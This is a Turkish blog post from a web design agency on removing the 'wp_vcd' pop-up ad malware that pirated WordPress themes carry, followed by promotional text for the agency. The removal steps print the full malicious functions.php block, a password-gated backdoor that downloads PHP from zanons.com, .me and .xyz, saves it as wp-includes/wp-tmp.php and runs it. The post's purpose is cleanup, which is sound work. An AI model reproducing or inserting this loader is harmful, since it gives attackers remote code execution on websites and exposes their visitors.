WordPress Functions Pop-up Reklam Virüsü | Nasıl Temizlenir?

Wordpress Functions Pop-up Reklam Virüsü Nasıl KaldırılırDaha önce başıma çok kez gelmiş olan bir durum; wordpress functions reklam / pop-up virüsü. Bu virüs diğer virüslere nadiren biraz daha zor silinen bir virüs türü. Virüsün genel amacı reklamlar yaymak ve virüsü kodlayan kişiye para kazandırmak. Aslında çok zekice bir sistem ama işte virüsü yiyen kişi için bu o kadar da güzel birşey olmayabilir. WordPress Functions Pop-up Reklam Virüsü sitenize bulaşınca sitenize giren kullanıcılar bir yere tıklayınca reklam sayfalarına yönlenir veya bir yere tıklamasa bile hemen sitenizden başka bir siteye yönlendirilebilir.

Bu Virüs Nasıl Bulaşır?

Virüsün bulaşma nedeni; çok büyük ihtimal ile warez/crack tema kullanmanız. Eklenti de olabilir ama genel olarak bu virüs temada bulunur. Tahminen ücretli premium temayı crack/warez yani korsan sürümünü indirmiş ve kullanmaya çalışmışsınızdır. Bu olabilir, gayet normal. Ama korsan tema kullanımı resmiyete göre yasak arkadaşlar, ona göre.

Virüs nereye bulaşır; virüs temanızın functions.php dosyasına ve wordpress’in wp-includes klasörüne bulaşır.

Virüsün Bulaştığı Nasıl Anlaşılır?

Yöntem 1 : Telefon veya bilgisayardan tarayıcıyı açın, gizli sekmeden siteye giriş yapın. Herhangi bir içerik sayfasına geçin. Sayfada herhangi bir yere tıklayın. Reklam virüsü varsa zaten direkt ilgisiz sayfalara yönlendirileceksinizdir. Tıkladığınızda birşey olmuyorsa virüs yok diye düşünmeyin, 2. yönteme bakın.

Yöntem 2 :  WordPress Görünüm menüsünden Düzenleyici sekmesine girin. Functions.php dosyasını açın. Functions.php dosyanız aşağıdaki kod ile başlıyorsa sitenizde WordPress Functions Pop-up Reklam Virüsü var demektir;

<?php if (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ‘XXXXXXXXXXXXXXXXXXXXXX’)) { if ( ! function_exists( ‘wp_temp_setup’ ) ) { $path=$_SERVER[‘HTTP_HOST’].$_SERVER[REQUEST_URI];


Virüs Nasıl Kaldırılır?
  1. Adım; Functions.php dosyanızı açın. Ve aşağıdaki kodu functions.php içerisinden silin.
<?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'XXXXXXXXXXXXXXXXXXXXXX')) { if ( ! function_exists( 'wp_temp_setup' ) ) { $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI]; 
$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
         
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
           if( fwrite($handle, "<?php\n" . $phpCode))
           {
           }
            else
            {
            $tmpfname = tempnam('./', "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
            fwrite($handle, "<?php\n" . $phpCode);
            }
            fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }
$wp_auth_key='08b370e35d008b6591dd40b0eec23025';
        if (($tmpcontent = <span class="userTag"><span class="userTag"><span class="userTag">@file_get_contents("</span></span></span>http://www.zanons.com/code.php") OR $tmpcontent = <span class="userTag"><span class="userTag">@file_get_contents_tcurl("</span></span>http://www.zanons.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                <span class="userTag"><span class="userTag">@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);</span></span>
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    <span class="userTag"><span class="userTag">@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);</span></span>
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        <span class="userTag"><span class="userTag">@file_put_contents('wp-tmp.php', $tmpcontent);</span></span>
                    }
                }
            }
        }
        elseif ($tmpcontent = <span class="userTag"><span class="userTag"><span class="userTag">@file_get_contents("</span></span></span>http://www.zanons.me/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                <span class="userTag"><span class="userTag">@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);</span></span>              
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    <span class="userTag"><span class="userTag">@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);</span></span>
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        <span class="userTag"><span class="userTag">@file_put_contents('wp-tmp.php', $tmpcontent);</span></span>
                    }
                }           
            }
        } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 
        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 
        } elseif (($tmpcontent = <span class="userTag"><span class="userTag"><span class="userTag">@file_get_contents("</span></span></span>http://www.zanons.xyz/code.php") OR $tmpcontent = <span class="userTag"><span class="userTag">@file_get_contents_tcurl("</span></span>http://www.zanons.xyz/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 
        }                  
    }
} 
?>

2. Adım; /wp-includes/ klasörü içerisinde bulunan wp-tmp.php ve wp-vcd.php dosyasını silin.

2 Adımı da uyguladıysanız virüs silinir, silinmezse yorum atın yardımcı oluruz.

İzmir Web Tasarım

Fiber Web Tasarım 2015 yılında kurulmuş olup; diyarbakır web tasarım, diyarbakır logo tasarımı, diyarbakır seo (arama motoru) optimizasyonu, diyarbakır dijital reklamcılık, diyarbakır e-ticaret v.s .. bir çok hizmet veren diyarbakır'in dev web tasarım ajanslarından biridir. Diyarbakır'deki en iyi web tasarım firmaları, diyarbakırin en iyi web tasarım şirketleri, en iyi diyarbakır web tasarım ajansları gibi aramalar yapıyorsanız şuan doğru sayfadasınız. Fiber Web Tasarım ekibi olarak hizmetlerimiz sayfasında belirtmiş olduğumuz tüm hizmetleri vermekteyiz. Ekibimizin önceliği işi zamanında bitirmek. Zamanında bitirmekten ziyade güzel bir iş çıkarmak isteriz. Sizler de internet sayfanıza (sitenize) hız veya seo çalışması yapmak isterseniz sizleri her zaman bekleriz.

Diyarbakır'in en iyi web tasarım ajanslarından biri olarak; sizlere elimizden gelenin daha fazlasını yaparak mutlu olmanızı sağlıyoruz. Müşterilerimizi nasıl mutlu edeceğimizi bizden başka kimse daha çok bilemez. Nasıl mı biliyoruz; çünkü kendimizi müşteri yerine koyuyoruz. Biz müşteri olsaydık nasıl mutlu olurduk diye düşünüyoruz. Cevabı çok basit; çok güzel bir iş çıkarıldığını görünce çok mutlu oluruz mesela. Çok güzel şeyler yapınca müşteri de işini daha iyi hale getirir, daha çok büyütür. İşlerin büyümesi müşterilerin artması demektir. Müşteriler çoğalınca iş yerinizi büyütebilir ve bu sayede mutlu olabilirsiniz. İşte bizler tam olarak bunu sağlamak için çalışırız. Daha çok müşteri kazanabilmeniz veya çok güzel projeler ortaya çıkarabilmek için. Sizler de sayemizde işinizi büyütüp daha çok müşteri kazanmak istiyorsanız fiyatlar sayfamızdan size uygun paket seçeneği ile hizmetimizden yararlanın!

Fiber Web Tasarım Olarak Diyarbakır'in hemen hemen tüm ilçelerine (Bismil, Bağlar, Çermik, Dicle, Eğil, Ergani,Çınar, Çüngüş, Hani, Hazro, Kulp, Lice, Silvan,Kayapınar, Kocaköy, Sur, Yenişehir) hizmet vermekteyiz. Sizler de; internet sayfası kurmak istiyorum, diyarbakır web tasarım ofisi, kurumsal web tasarım diyarbakır, kendi web sayfamı oluşturmak istiyorum, kendi sitemi nasıl açarım, kişisel web sayfası kurmak, e-ticaret (internet üzeri mağaza) nası açılır, işimi internet ortamına nasıl taşırım, internet ortamında nasıl reklam yaparım/yaptırabilirim diye düşüncelere dalıyorsanız, çözüm bulamıyorsanız şuan doğru sayfadasınız demektir.

>